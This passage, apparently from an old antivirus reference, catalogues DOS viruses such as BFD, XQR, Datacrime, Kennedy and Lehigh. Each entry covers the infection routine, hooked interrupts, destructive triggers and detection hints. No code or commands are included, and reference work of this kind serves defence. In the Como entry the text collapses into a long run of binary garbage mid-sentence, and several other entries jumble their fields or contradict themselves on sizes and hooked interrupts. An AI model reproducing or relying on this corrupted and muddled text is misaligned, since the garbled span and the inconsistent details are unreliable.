  5409.             (infects .COM & .EXE files)
  5410. Virus Length: Not Applicable
  5411. PC Vectors Hooked: INT 21h, INT 24h, INT 1Ch,
  5412.                    INT 13h.
  5413. Executing Procedure:
  5414. 1) The Virus will decrease the total system memory
  5415.    by 3K Bytes when the system is booted from an
  5416.    infected disk.
  5417. 2) It then checks whether it has is loaded in
  5418.    resident memory, if "No", then it will load to
  5419.    the last 3K bytes of resident memory by hooking
  5420.    INT 21h and INT 1Ch.
  5421. 3) It infects files when they are executed.
  5422. Damage:  None.
  5423. Detecting Method:  Infected files increase 927--
  5424.                    1000 Bytes.
  5425. Note:  Multi-2 hooks INT 24h when infecting
  5426.        files. It omits I/O errors (such as write
  5427.        protect).
  5428.  
  5429. [BFD]
  5430. Virus Name: BFD
  5431. Virus Type: Boot sector Infector and File
  5432.             Infector Virus
  5433. Virus Length: No change
  5434. PC Vectors Hooked: INT 13h, INT 24h.
  5435. Executing Procedure:
  5436. 1) The virus decreases the total system memory
  5437.    by  2K Bytes when the system is booted from
  5438.    an infected disk.
  5439. 2) It loads itself in the last 4K Bytes of
  5440.    resident memory.
  5441. 3) It hooks INT 13h.
  5442. 4) When you turn on the computer as usual the
  5443.    resident memory virus infects boot sector
  5444.    and files when "READING & WRITING" uninfected
  5445.    disks or programs.
  5446. Damage: Overwrites original files, so the length
  5447.         of infected files won't increase.
  5448. Detecting Method:  None.
  5449. Note:
  5450. 1) BFD hooks INT 24h when infecting files or Boot
  5451.    Sector. It omits I/O errors (such as write
  5452.    protect).
  5453.  
  5454. [BFD-B]
  5455. Virus Name: BFD-B
  5456. Virus Type: File Infector Virus and Boot Sector
  5457.             Infector  (Multi-partite Virus)
  5458. Virus Length: No change.
  5459. PC Vectors Hooked: INT 13h, INT 24h.
  5460. Executing Procedure:
  5461. 1) When you execute the file, it will check
  5462.    whether the Boot Sector of the hard disk has
  5463.    been infected, if "No", it will infect the
  5464.    boot sector .
  5465. 2) It then checks whether it has loaded itself
  5466.    resident in memory, if "No", then it loads
  5467.    itself resident in memory by   hooking INT 21h
  5468.    and INT 13h .  After the virus has loaded
  5469.    itself in to resident   memory it will infect
  5470.    boot sectors and files while "READING &
  5471.    WRITING" uninfected disks or programs.
  5472. Damage: Overwrites original files, so the length
  5473.         of infected files won't increase.
  5474. Detecting Method:  None.
  5475. Note:
  5476. 1) BFD hooks INT 24h when infecting files or boot
  5477.    sector. It omits I/O errors (such as write
  5478.    protect).
  5479.  
  5480. [XQR]
  5481. Virus Name: XQR
  5482. Virus Type: Partition table Infector and File
  5483.             Infector Virus.
  5484. Virus Length: Not Applicable
  5485. PC Vectors Hooked: INT 21h, INT 24h, INT 13h,
  5486.                    INT 8h.
  5487. Executing Procedure:
  5488. 1) The Virus decreases the total system memory by
  5489.    4K Bytes,  when the system is booted from an
  5490.    infected disk.
  5491. 2) The virus loads itself in to the last 4K Bytes
  5492.    of resident memory.
  5493. 3) It then hooks INT 13h.
  5494. 4) When the computer is turned on normally the
  5495.    virus will check   whether the system date is
  5496.    May 4th,  if "Yes", a message will appear on
  5497.    the screen: " XQR: Wherever, I love you Forever
  5498.    and ever! The beautiful memory for ours in that
  5499.    summer time has been recorded in Computer
  5500.    history . Bon voyage, my dear XQR! "
  5501. 5) It continues to infect any executed program.
  5502. Damage:  When it is Sunday, the virus will change
  5503.          the settings of the keyboard.
  5504. Detecting Method:  Check whether the keyboard is
  5505.                    normal.
  5506. INT 13h:
  5507. 1) When system starts from hard disk the virus will
  5508.    hook INT 21h by INT 13h.
  5509. 2) Check whether someone wants to read sector #1,
  5510.    if "yes", then give the original data of
  5511.    sector #1 to be seen.
  5512. 3) Check whether someone wants to overwrite the
  5513.    file "XQR" in hard disk, If "yes", then omit
  5514.    the calling. INT 8h:  Check whether INT 21h is
  5515.    called, if "yes", then hook it again by INT 8h.
  5516. Note: XQR hooks INT 24h when infecting files. It
  5517.       omits I/O errors (such as write protect).
  5518.  
  5519. [Bogus]
  5520. Virus Name: BOGUS
  5521. Virus Type: Partition table Infector and File
  5522.             Infector Virus
  5523. Virus Length: No change.
  5524. PC Vectors Hooked: INT 21h, INT 24h, INT 13h.
  5525. Executing Procedure:
  5526. 1) The Virus decreases the total system memory by
  5527.    4K Bytes,  when the system is booted from an
  5528.    infected disk.
  5529. 2) The virus loads itself in to the last 4K Bytes
  5530.    of  resident memory.
  5531. 3) It then hooks INT 13h.
  5532. 4) It continues to infect any executed program.
  5533. Damage:  When the number of infected files is
  5534.          larger than 2710, then it destroys all
  5535.          the data on the hard disk.
  5536. Detecting Method:  Check whether the file head
  5537.                    is INT 13h(AX=90 or 91).
  5538. Note:
  5539. 1) BOGUS hooks INT 24h when infecting files. It
  5540.    omits I/O errors (such as write protect).
  5541. 2) If  the computer is booted from a diskette,
  5542.    you will not be able to view the hard drive.
  5543.  
  5544. [Invol-1]
  5545. Virus Name: INVOL-1
  5546. Virus Type: EXE & SYS and File Infector.
  5547. Virus Length: 1350/60 Bytes(EXE), 2720
  5548.               Bytes( SYS)
  5549. PC Vectors Hooked: INT 21h.
  5550. Executing Procedure:
  5551. EXE File:
  5552. 1) The virus searches for the first command of
  5553.    "C:\CONFIG.SYS", if the command is *.*=xxxx.yyy
  5554.    the virus will infect the file.
  5555. 2) Then it finishes executing the original file.
  5556. 3) The file infects when an uninfected program is
  5557.    executed.
  5558. SYS File:
  5559. 1) Hooks INT 21h and loads resident memory.
  5560. 2) Executes the original file.
  5561. Damage:  Checks whether it is 20th of the month,
  5562.          if "Yes", then it destroys all hard disk
  5563.          data.
  5564. Detecting Method:
  5565. Infected .EXE files increase by 1350 Bytes, SYS
  5566. files increase by 2720 Bytes.
  5567. Note:
  5568. 1) INVOL-1 doesn't hook INT 24h when infecting
  5569.    files. It omits I/O errors (such as write
  5570.    protect).
  5571.  
  5572. [August16]
  5573. Virus Name: August16
  5574. Other names: Iron maiden
  5575. Virus Type: Parasitic Virus (infects .COM files)
  5576. Virus Length: 636 Bytes
  5577. PC Vectors Hooked: Int 21
  5578. Executing Procedure:
  5579. 1)  The virus checks whether it the first two
  5580.     .COM   files in the current directory have
  5581.     been infected.
  5582. 2) If "No" it will proceed to infect them.
  5583. 3) If  Yes" it checks the current directory on the
  5584.    C:\drive to     see whether it has two .COM
  5585.    files.
  5586. 4) If Yes" it will proceed to infect them.
  5587. 5) Then the original file is executed.
  5588. Damage:
  5589. 1) August16 overwrites the original file to hide
  5590.    changes to the file s date  and time in the
  5591.    directory listing.
  5592. 2) Adds two text strings to  infected files:
  5593.    "*.COM AA", "=!=IRON MAIDEN."
  5594. Detecting Method:
  5595. 1) .COM file growth
  5596. 2) Unexpected access to    C:\drive
  5597. Note: August16 doesn't hook INT 24h when
  5598.       infecting files.  An error message occurs if
  5599.       there is an I/O error (such as write
  5600.       protect).
  5601.  
  5602. [BkMonday]
  5603. Virus Name: BKMonday
  5604. Other names: Virus 1055
  5605. Virus Type: File Infector Virus
  5606. Virus Length: 1055 bytes
  5607. PC Vectors Hooked:  Int 21
  5608. Damage: Formats first 240 cylinders of the
  5609.         first hard drive.
  5610. Detecting Method:
  5611. Overwrites the original file in order to hide
  5612. changes to the file after infection.
  5613. Note: Loads itself resident in memory.  An
  5614.       error message occurs if there is an I/O
  5615.       error (such as write protect).
  5616.  
  5617. [Devil's_Dance]
  5618. Virus Name: Devil's_Dance
  5619. Other names: Virus 941
  5620. Virus Type: File Infector Virus
  5621. Virus Length: 941 bytes
  5622. PC Vectors Hooked:  Int 21
  5623. Executing Procedure:
  5624. 1)  The virus checks whether it is already loaded
  5625.     resident in memory. If "No", it then loads
  5626.     itself into resident memory by hooking INT
  5627.     21h.
  5628. 2) It then executes the original file.
  5629. 3) With itself loaded into resident memory it will
  5630.    infect any uninfected file that is executed.
  5631. Damage:
  5632. The Devil's_Dance virus monitors the Int 9
  5633. (keyboard).  A routine for cursor manipulation is
  5634. activated when 5 keys other than the  Alt" key
  5635. have been depressed. Furthermore, if the  Alt" key
  5636. is not depressed, attributes of the cursor in
  5637. Video-RAM are changed after any other key is
  5638. pressed.  The new attributes are as follows: 09h
  5639. (bright blue), 0ah (bright green), obh (bright
  5640. cyan), 0ch (bright red), 0dh (bright violet), oeh
  5641. (bright yellow). If the above five keys are not
  5642. pressed, the virus will not manifest itself.
  5643. If  Del" is depressed, the virus will display
  5644. characters using the color white.  The virus
  5645. displays the following message: Have you ever
  5646. danced with the devil under the weak light of the
  5647. moon?.... Pray for your disk...The Joker
  5648. HAHAHAHAHAHAHAHAHAHA."
  5649. The virus will finally test whether any keys were
  5650. pressed 2500 times.  If yes, the virus overwrites
  5651. the  Disk Partition Table of the first hard disk
  5652. and proceeds to crash the system.
  5653. Note:  Loads itself resident in memory.  An
  5654.        error message occurs if there is an I/O
  5655.        error (such as write protect).
  5656.  
  5657. [Hero-394]
  5658. Virus Name: HERO-394
  5659. Other names: None
  5660. Virus Type: File Infector Virus
  5661. Virus Length: Increases infected EXE file size
  5662.               by 394 bytes
  5663. Damage: None
  5664. Detecting Method Virus will check system date.
  5665. If it is the first day of the month, a confusing
  5666. code will be displayed on the screen.  Virus
  5667. increases infected EXE file size by 394 bytes.
  5668.  
  5669. [NOPX_2.1]
  5670. Virus Name: NOPX_2.1
  5671. Other names: None
  5672. Virus Type: File Infector Virus
  5673. Virus Length: Increase infected .EXE file size
  5674.               by 1686 bytes, also .COM file.
  5675. PC Vectors Hooked:  Int 21
  5676. Executing Procedure:
  5677. 1)  The virus checks whether it is already loaded
  5678.     resident in memory. If "No", it then loads
  5679.     itself into resident memory by hooking INT
  5680.     21h.
  5681. 2) It then executes the original file.
  5682. 3) With itself loaded into resident memory it will
  5683.    infect any uninfected file that is executed.
  5684. Damage:
  5685. The virus has bugs in itself (Error in calculating
  5686. entry point). So some infected EXE files can't be
  5687. executed correctly. Detecting Method Increase
  5688. infected files size by 1686 bytes
  5689. Note:  Loads itself resident in memory.  An error
  5690. message occurs if there is an I/O error (such as
  5691. write protect).
  5692.  
  5693. [NCU_LI]
  5694. Virus Name: NCU_Li
  5695. Other names: None
  5696. Virus Type: File Infector Virus
  5697. Virus Length: 1690/1670 bytes.
  5698. PC Vectors Hooked: Int 21
  5699. Executing Procedure:
  5700. 1)  The virus checks whether it is already loaded
  5701.     resident in memory. If "No", it then loads
  5702.     itself into resident memory by hooking INT
  5703.     21h.
  5704. 2) It then executes the original file.
  5705. 3) With itself loaded into resident memory it will
  5706.    infect any uninfected file that is executed.
  5707. Damage: None
  5708. Detecting Method: Increase infected files size
  5709.                   by 1690/1670 bytes
  5710. Note: Loads itself  resident in memory.  An
  5711.       error message occurs if there is an I/O
  5712.       error (such as write protect).
  5713.  
  5714. [Ghost-A]
  5715. Virus Name: GHOST-A
  5716. Other names: None
  5717. Virus Type: File Infector Virus
  5718. Virus Length: 330 bytes.
  5719. Executing Procedure:
  5720. 1) The virus checks whether it is already loaded
  5721.    resident in memory. If "No", it then loads
  5722.    itself into resident memory by hooking INT
  5723.    21h.
  5724. 2) It then executes the original file.
  5725. 3) With itself loaded into resident memory it will
  5726.    infect any uninfected file that is executed.
  5727. Damage: The executed file will be deleted after
  5728.         virus has resided in memory and the system
  5729.         date is Friday.  Virus halts the system.
  5730. Detecting Method: Increases infected file size
  5731.                   by 330 bytes
  5732. Note:
  5733. 1) Loads itself resident in memory.  An error
  5734.    message occurs if there is an I/O error (such
  5735.    as write protect).
  5736.  
  5737. [VVF34]
  5738. Virus Name: VVF34
  5739. Other names: None
  5740. Virus Type: File Infector Virus
  5741. Virus Length:.EXE 1614-1624 bytes and  .COM 1614
  5742.               bytes.
  5743. Executing Procedure:
  5744. 1) The virus checks whether it is already loaded
  5745.    resident in memory. If "No", it then loads
  5746.    itself into resident memory by hooking INT
  5747.    21h.
  5748. 2) It then executes the original file.
  5749. 3) With itself loaded into resident memory it will
  5750.    infect any uninfected file that is executed.
  5751. Damage: The virus hooks 1Ch.  After the virus has
  5752.         resided in memory for 5 minutes and 15
  5753.         files have already been infected, the
  5754.         virus will proceed to draw a portrait in
  5755.         the center of the screen.  The virus will
  5756.         also hook the interrupt 9h (keyboard
  5757.         interrupt). The virus will then display
  5758.         the following message when the user
  5759.         presses any  key:  Bu, Bu, Bu..."
  5760.         Detecting Method Increases infected file
  5761.         size by 1614/1624 bytes
  5762. Note:  Loads itself resident in memory.  An
  5763.        error message occurs if there is an  I/O
  5764.        error (such as write protect).
  5765.  
  5766. [Damage-B]
  5767. Virus Name: DAMAGE-B
  5768. Other names: None
  5769. Virus Type: Parasitic Virus
  5770. Virus Length: 1110 bytes.
  5771. Executing Procedure:
  5772. 1) The virus checks whether it is already loaded
  5773.    resident in memory. If "No", it then loads
  5774.    itself into resident memory by hooking INT
  5775.    21h.
  5776. 2) It then executes the original file.
  5777. 3) With itself loaded into resident memory it will
  5778.    infect any uninfected file that is executed.
  5779. Damage: Virus checks system date.  If it is
  5780.         Tuesday, it will format the hard disk.
  5781.         Detecting Method Increases infected file
  5782.         size by 1110 bytes
  5783. Note:  Loads itself resident in memory.  An error
  5784.        message occurs if there is an I/O error
  5785.        (such as write protect).
  5786.  
  5787. [Fam1]
  5788. Virus Name: FAM1
  5789. Other names: None
  5790. Virus Type: File Infector Virus
  5791. Virus Length: 1063 bytes.
  5792. Executing Procedure:
  5793. 1) The virus checks whether it is already loaded
  5794.    resident in memory. If "No", it then loads
  5795.    itself into resident memory by hooking INT
  5796.    21h.
  5797. 2) It then executes the original file.
  5798. 3) With itself loaded into resident memory it will
  5799.    infect any uninfected file that is executed.
  5800. Damage: None.
  5801. Detecting Method Increases infected file size by
  5802. 1036 bytes.  This occurs only with the MONO
  5803. display card.
  5804. Note:  Loads itself resident in memory.  An error
  5805.        message occurs if there is an I/O error
  5806.        (such as write protect).
  5807.  
  5808. [Malaise]
  5809. Virus Name: MALAISE
  5810. Other names: None
  5811. Virus Type: File Infector Virus
  5812. Virus Length: 1335/1365 bytes.
  5813. Executing Procedure:
  5814. 1)  The virus checks whether it is already loaded
  5815.     resident in memory. If "No", it then loads
  5816.     itself into resident memory by hooking INT
  5817.     21h.
  5818. 2) It then executes the original file.
  5819. 3) With itself loaded into resident memory it will
  5820.    infect any uninfected file that is executed.
  5821. Damage: None.
  5822. Detecting Method Increases infected files size by
  5823. 1335-1365 bytes
  5824. Note:  Loads itself resident in memory.  An error
  5825.        message occurs if there is an I/O error
  5826.        (such as write protect).
  5827.  
  5828. [Walker]
  5829. Virus Name: WALKER
  5830. Other names: None
  5831. Virus Type: File Infector Virus
  5832. Virus Length:.EXE 3845 bytes and .COM 3852
  5833.              bytes.
  5834. Executing Procedure:
  5835. 1) The virus checks whether it is already
  5836.    loaded resident in memory. If "No", it then
  5837.    loads itself into resident memory by hooking
  5838.    INT 21h.
  5839. 2) It then executes the original file.
  5840. 3) With itself loaded into resident memory it
  5841.    will infect any uninfected file that is
  5842.    executed.
  5843. Damage: None
  5844. Detecting Method Interrupt 16 will be hooked.  A
  5845. man walking across the  screen for the duration
  5846. of 14 seconds will occasionally be displayed.
  5847. Increases infected file size by 3845/3852 bytes
  5848. Note:  Loads itself resident in memory  An error
  5849.        message occurs  if there is an I/O error
  5850.        (such as write  protect).
  5851.  
  5852. [Proto-T]
  5853. Virus Name: PROTO-T
  5854. Other names: None
  5855. Virus Type: File Infector Virus
  5856. Virus Length:.COM 695 bytes.
  5857. Executing Procedure:
  5858. 1) The virus checks whether it is already loaded
  5859.    resident in memory. If "No", it then loads
  5860.    itself into resident memory by hooking INT
  5861.    21h.
  5862. 2) It then executes the original file.
  5863. 3) With itself loaded into resident memory it will
  5864.    infect any uninfected file that is executed.
  5865. Damage: None
  5866. Detecting Method Increases infected files size
  5867. by 695 bytes
  5868. Note:  Loads itself resident in memory.  An error
  5869.        message occurs if there is an I/O error
  5870.        (such as write protect).
  5871.  
  5872. [QMU]
  5873. Virus Name: QMU
  5874. Other names: None
  5875. Virus Type: Multi-partite Virus
  5876. Virus Length:.COM 1513 bytes.
  5877. Executing Procedure:
  5878. 1) The virus checks whether it is already loaded
  5879.    resident in memory. If "No", it then loads
  5880.    itself into resident memory by hooking INT 21h.
  5881. 2) It then executes the original file.
  5882. 3) With itself loaded into resident memory it will
  5883.    infect any uninfected file that is executed.
  5884. Damage: Hard disk cannot be booted after the
  5885.         virus internal counter reaches 100.
  5886.         Detecting Method Increases infected file
  5887.         size by 1513 bytes
  5888. Note:  Loads itself resident in memory.  An error
  5889.        message occurs if there is an I/O error
  5890.        (such as write protect).
  5891.  
  5892. [492]
  5893. Virus Name: 492
  5894. Other names: None
  5895. Virus Type: File Infector Virus
  5896. Virus Length:.COM 492 bytes.
  5897. Executing Procedure:
  5898. 1) The virus checks whether it is already loaded
  5899.    resident in memory. If "No", it then loads
  5900.    itself into resident memory by hooking INT
  5901.    21h.
  5902. 2) It then executes the original file.
  5903. 3) With itself loaded into resident memory it will
  5904.    infect any uninfected file that is executed.
  5905. Damage:
  5906. Virus will check the system date. If it is the
  5907. 14th day of the month and it is a Saturday, the
  5908. virus will erase all data on the hard disk.
  5909. Detecting Method Increases infected file size
  5910. by 492 bytes
  5911. Note:
  5912. Loads itself resident in memory.  An error
  5913. message occurs if there is an I/O error
  5914. (such as write protect).
  5915.  
  5916. [Reaper]
  5917. Virus Name: REAPER
  5918. Other names: None
  5919. Virus Type: File Infector Virus
  5920. Virus Length: 1072 bytes.
  5921. Executing Procedure:
  5922. 1) The virus checks whether it is already loaded
  5923.    resident in memory. If "No", it then loads
  5924.    itself into resident memory by hooking INT 21h.
  5925. 2) It then executes the original file.
  5926. 3) With itself loaded into resident memory it will
  5927.    infect any uninfected file that is executed.
  5928. Damage: The Reaper virus will check the system
  5929.         date after it resides in memory. If it is
  5930.         Aug 21, the virus will display the
  5931.         following message: "Reaper Man. (c) 92,
  5932.         Apache Warrior, ARCV Pres." Detecting
  5933.         Method Increases infected file size by
  5934.         1072 bytes
  5935. Note: Loads itself resident in memory.  An error
  5936.       message occurs if there is an I/O error
  5937.       (such as write protect).
  5938.  
  5939. [Jump4Joy]
  5940. Virus Name: JUMP4JOY
  5941. Other names: None
  5942. Virus Type: File Infector Virus
  5943. Virus Length:.COM 1273 bytes.
  5944. Executing Procedure:
  5945. 1) The virus checks whether it is already loaded
  5946.    resident in memory. If "No", it then loads
  5947.    itself into resident memory by hooking INT 21h.
  5948. 2) It then executes the original file.
  5949. 3) With itself loaded into resident memory it will
  5950.    infect any uninfected file that is executed.
  5951.    b) It doesn't infect .EXE files.
  5952. Damage: None
  5953. Detecting Method Increases infected file size
  5954. by 1273 bytes
  5955. Note:  Loads itself resident in memory.  An error
  5956.        message occurs if there is an I/O error
  5957.        (such as write protect).
  5958.  
  5959. [Aragorn]
  5960. Virus Name: ARAGORN
  5961. Other names: None
  5962. Virus Type: Boot Strap Sector Virus
  5963. Damage: None
  5964. Detecting Method Only floppy diskette in drive
  5965. A will be infected.
  5966.  
  5967. $#Trash
  5968. Virus Name: TRASH
  5969. Other names: None
  5970. Virus Type: Boot Strap Sector Virus
  5971. Virus Length: 1241 bytes.
  5972. Damage:
  5973. Virus will overwrite the Partition Table.
  5974. Detecting Method Virus will not infect any files.
  5975. Virus will display the following message:
  5976. Warning!!!  This program will zero (DESTROY) the
  5977. master boot record of your first hard disk. The
  5978. purpose of this is to test the anti-virus software,
  5979. so be sure you have installed your favorite
  5980. protecting program before running this one!  It is
  5981. almost certain that it will fail to protect you
  5982. anyway. Press any key to abort, or press Ctrl-Alt-
  5983. Right Shift- F5 to proceed at your own risk."
  5984. Virus will proceed to overwrite the Partition
  5985. Table if user presses  Ctrl-Alt-Right Shift-F5."
  5986.  
  5987. [Data Crime]
  5988. Virus Name: Datacrime
  5989. Other names: 1168, Columbus Day
  5990. Virus Type: File Infector Virus
  5991. Virus Length: 1168 bytes.
  5992. Executing Procedure:
  5993. 1) The virus checks whether it is already loaded
  5994.    resident in memory. If "No", it then loads
  5995.    itself into resident memory by hooking INT 21h.
  5996. 2) It then executes the original file.
  5997. 3) With itself loaded into resident memory it will
  5998.    infect any uninfected file that is executed.
  5999.    b) It doesn't infect .EXE files.
  6000. Damage:
  6001. Virus will low-level format your hard disk after
  6002. October 12th. Detecting Method Virus infects all
  6003. .COM files between April 1st-October 12th.  After
  6004. October 12th, it  will display the following
  6005. message: "DATACRIME VIRUS Released:1 March 1989."
  6006. And it will low level format your hard disk.
  6007. Note:  Loads itself resident in memory.  An error
  6008.        message occurs if there is an I/O error
  6009.        (such as write protect).
  6010.  
  6011. $#Data Crime II
  6012. Virus Name: Datacrime II
  6013. Other names: None
  6014. Virus Type: File Infector Virus
  6015. Virus Length: Increases .COM and .EXE files by
  6016.               1514 bytes.
  6017. Damage:
  6018. Virus will low level format the cylinder 0 of your
  6019. hard disk after October 12th. Detecting Method
  6020. Between October 12th-31st, excluding Mondays, the
  6021. virus will display the following message:
  6022. "DATACRIME-2 VIRUS."  The virus will proceed to
  6023. low level format cylinder  0 of the hard disk.
  6024. Then the system will hang.
  6025.  
  6026. [Marauder]
  6027. Virus Name: Marauder
  6028. Other names: None
  6029. Virus Type: File Infector Virus
  6030. Virus Length: Increases .COM file by 860 bytes.
  6031. Executing Procedure:
  6032. 1) The virus searches the current directory for a
  6033.    .COM file.  Once it locates a file it checks
  6034.    whether it is already infected by the Marauder
  6035.    virus. If "No", it then it infects the file.
  6036. 2) If  Yes" then it searches for another .COM file
  6037.    to infect. b) It doesn't infect .EXE files.
  6038. 3) It then executes the original file.
  6039. Damage:
  6040. The Marauder virus will overwrite your files,
  6041. on every February 2nd with the string
  6042. "=[Marauder] 1992 Hellraiser -Phalcon/Skism."
  6043. Detecting Method When the infected file is
  6044. executed, the virus will infect the first
  6045. uninfected .COM file in current directory.
  6046. On every February 2nd, the virus will overwrite
  6047. all executed files by following characters one by
  6048. one "=[Aarauder] 1992 Hellraiser - Phalcon/skism."
  6049.  
  6050. [Oropax]
  6051. Virus Name: Oropax
  6052. Other names: None
  6053. Virus Type: File Infector Virus
  6054. Virus Length: 2756-2800 bytes
  6055. Executing Procedure:
  6056. 1) The virus checks whether it is already loaded
  6057.    resident in memory. If "No", it then loads
  6058.    itself into resident memory by hooking INT 21h.
  6059. 2) It then executes the original file.
  6060. 3) With itself loaded into resident memory it will
  6061.    infect any uninfected file that is executed.
  6062.    b) It doesn't infect .EXE files.
  6063. Damage:
  6064. Infected .COM file sizes increase by 2756-2800
  6065. bytes. Detecting Method Virus will hook the
  6066. interrupt 20h, 21h, 27h.  If the system date is
  6067. after May 1, 1987 and it is an IBM  compatible
  6068. computer, interrupt 8h will be hooked. When the
  6069. virus is triggered, it will play the "Stars",
  6070. "Blue" and "Forty" songs one by one every eight
  6071. minutes.
  6072. Note:  Loads itself resident in memory.  An error
  6073.        message occurs if there is an I/O error
  6074.        (such as write protect).
  6075.  
  6076. [dBASE]
  6077. Virus Name: dBASE
  6078. Other names: None
  6079. Virus Type: File Infector Virus
  6080. Virus Length: 1864 bytes
  6081. Executing Procedure:
  6082. 1) The virus checks whether it is already loaded
  6083.    resident in memory. If "No", it then loads
  6084.    itself into resident memory by hooking INT
  6085.    21h.
  6086. 2) It then executes the original file.
  6087. 3) With itself loaded into resident memory it will
  6088.    infect any uninfected file that is executed.
  6089.    b) It doesn't infect .EXE files.
  6090. Damage:
  6091. Every executed .COM file increases by 1864 bytes.
  6092. Virus will sometimes cause system to halt.
  6093. Detecting Method Virus will hook the interrupt
  6094. 21h.   When the virus is activated, it will switch
  6095. high-byte and low-byte of every opened .DBF
  6096. data files.  Virus will also create a hidden file
  6097. - "BUG.DAT" in the root directory of every infected 
  6098. .DBF file's name.
  6099. Note:  Loads itself resident in memory.  An error
  6100.        message occurs if there is an I/O error
  6101.        (such as write protect).
  6102.  
  6103. [Halloween]
  6104. Virus Name: Halloween
  6105. Other names: Happy Halloween
  6106. Virus Type: File Infector Virus
  6107. Virus Length: N/A
  6108. Executing Procedure:
  6109. 1) The virus checks whether it is already loaded
  6110.    resident in memory. If "No", it then loads
  6111.    itself into resident memory by hooking INT 21h.
  6112. 2) It then executes the original file.
  6113. 3) With itself loaded into resident memory it will
  6114.    infect any uninfected file that is executed.
  6115.  
  6116. Damage: Virus finds an executable file (first .EXE file then
  6117. .COM) in current directory and proceeds to infect it.  It will
  6118. display "Runtime error 002 at 0000:0511" on screen if no
  6119. uninfected files are found. Detecting Method On every Oct 31,
  6120. virus will create a 10KB-long file and display "Runtime error 150
  6121. at 0000:0AC8."
  6122.  
  6123. Note:
  6124. 1) Loads itself resident in memory.  An error message occurs if
  6125.    there is an I/O error (such as write protect).
  6126.  
  6127. [Kennedy]
  6128. Virus Name: Kennedy
  6129. Other names: None
  6130. Virus Type: File Infector Virus
  6131. Virus Length: 333 bytes
  6132.  
  6133. Executing Procedure:
  6134. 1) The virus checks whether it is already loaded resident in
  6135.    memory. If "No", it then loads itself into resident memory by
  6136.    hooking INT 21h.
  6137. 2) It then executes the original file.
  6138. 3) With itself loaded into resident memory it will infect any
  6139.    uninfected file that is executed.
  6140.  
  6141. Damage: Virus destroys FAT. Detecting Method On June 6th,
  6142. November 8th, and November 22th, the virus will display the
  6143. following message:
  6144.  
  6145.     "Kennedy is dead - long live the Dead Kennedys."
  6146.  
  6147. Virus proceeds to destroy FAT.
  6148.  
  6149. Note:  Loads itself resident in memory.  An error message occurs
  6150.        if there is an I/O error (such as write protect).
  6151.  
  6152. [Virus-90]
  6153. Virus Name: Virus-90
  6154. Other names: None
  6155. Virus Type: File Infector Virus
  6156. Virus Length: .COM  857 bytes
  6157.  
  6158. Executing Procedure:
  6159. 1) The virus checks whether it is already loaded resident in
  6160.    memory. If "No", it then loads itself into resident memory by
  6161.    hooking INT 21h.
  6162. 2) It then executes the original file.
  6163. 3) With itself loaded into resident memory it will infect any
  6164.    uninfected file that is executed. b) It doesn't infect .EXE
  6165.    files.
  6166.  
  6167. Damage: Infected .COM files increase by 857 bytes. Detecting
  6168. Method Virus displays: Infected" when a file is infected.
  6169.  
  6170. Note:
  6171. 1) Loads itself resident in memory.  An error message occurs if
  6172.    there is an I/O error (such as write protect).
  6173.  
  6174. [Lehigh]
  6175. Virus Name: Lehigh
  6176. Other names: None
  6177. Virus Type: Parasitic Virus (infects COMMAND.COM only)
  6178. Virus Length: 555 bytes
  6179.  
  6180. Executing Procedure:
  6181. 1) The virus checks whether it is already loaded resident in
  6182.    memory. If "No", it then loads itself into resident memory by
  6183.    hooking INT 21h.
  6184. 2) Then when a disk is accessed if the COMMAND.COM is un-infected
  6185.    it will immediately infect it and execute the original file.
  6186. 3) With itself loaded into resident memory it searches for the
  6187.    infect any uninfected file that is executed.  b) It doesn't
  6188.    infect .EXE files.
  6189.  
  6190. Damage:
  6191. 1) Infects the disk s .COMMAND.COM file and increases it by 555
  6192.    bytes.
  6193. 2) After the count of infection  passes over four times the
  6194.    current disk will be trashed.
  6195.  
  6196. [Como]
  6197. Virus Name: Como
  6198. Virus Type: File Infector Virus
  6199. Virus Length: .EXE 2,020/2,030 bytes.
  6200.  
  6201. PC Vectors Hooked:  None.
  6202.  
  6203. Executing Procedure:
  6204. 1) It searches for an EXE file in the current directory.
  6205. 2) Then it checks if the file has been infected. If Yes", it
  6206.    continue to search.
  6207. 3) If an uninfected file is found, there is 50% probability for
  6208.    the file to get infected.
  6209.  
  6210. Infecting Procedure:
  6211. 1) The virus infects files by AH=4B in INT 21h. when running an
  6212.    uninfected program, the program will get   infected.
  6213. 2) Before infecting files, the virus hooks IqßΦ²ó╕▐±⌠*êß╞╬═╦▄╫*ÿε╤╩═╦Ñó*****ê╕╕╕╕╕╕p%)% 7xb$s=4)4jtI8-*9*ô┼╓≡╙∞Σ╜*ì▒Öñ┌⌡π÷┌╗²█╒Ñ*ëΘ*Ä╥²∩├▄√└╛ⁿ╖ú¼ª¥∙*è╖ó▓▐π*å▒╗╣│¬ùñ*ö¬ú╘╓φ╞∞╤ó*ì▓Éú²ß∙■⌠√╠α₧≥≈■ºΓÖ¡φ╦╒¼╤┌σ╓╛▌6l3+c
  6214. 1*>2=^ttxl#*
  6215. &
  6216. 0≈Ωß╢*Ƭ*êτ╞╦*ê┴*ÿ╘╫█┘╠▌╦ê╔ê╬┴─*ê±∞╕√≡²√*¢╚*Ç**Ç*è╪*î╪**ïσΓ╚╚╚**ì÷╕±÷■²√∞═*ê╩*ê∩·φ÷∞**ÿ±**è±═█**ê±∞╕√≈*,%)60cNxlw's;7'g%1N%65*ôⁿ▌≈┌■ΘΣ≈▄*Ĭ█├┌│╧·╥±**ì░Éúτ≡╕√▐▀*ô≈┌╛⌐ñ╖┘*Ç¿í∞╕*î≤ÿ╜┤⌐τóìπÅΣ¼Ñ┌╓º╛*Ç▒¼╬≈Ö≈╞ß÷¼⌠√╠≡╒τ╕°∩µÖ≡╫≈∞Θ*ôφ╥Ω╤vl
  6217. %Y7!x(6'
  6218. s'UFgcY7!╕½Ωⁿ╕≈■╕√═╪▄═┼╩═*ÿ┘╓▄ÿ┴▌╔*ê┴*ê─╔Ω ²Ω╕∞≡∙åσΓ╚╚╚┘╤┴╦╘╪*î╪***ä╚***ì∞²╕╕╕╕∙╕╬┴─*ê╟*ê╠╨▌ÿ█═╩╩═╞▄Ñó**êⁿ±δ≤╕*6(g7`fected. It's your task to find and delete
  6219.    them, best wishes. Press a key to execute the prompt."
  6220.  
  6221. Damage:  None.
  6222.  
  6223. Detecting Method:  Detect if  the file length increases by
  6224. 2,020/2,030 bytes.
  6225.  
  6226. Remarks:
  6227. 1) Non memory resident.
  6228. 2) Before infecting files, the virus does hooks INT 24h in order
  6229.    to omit the I/O error messages.
  6230.  
  6231. [512]
  6232. Virus Name: 512
  6233. Virus Type: File Infector Virus
  6234. Virus Length: 512 bytes
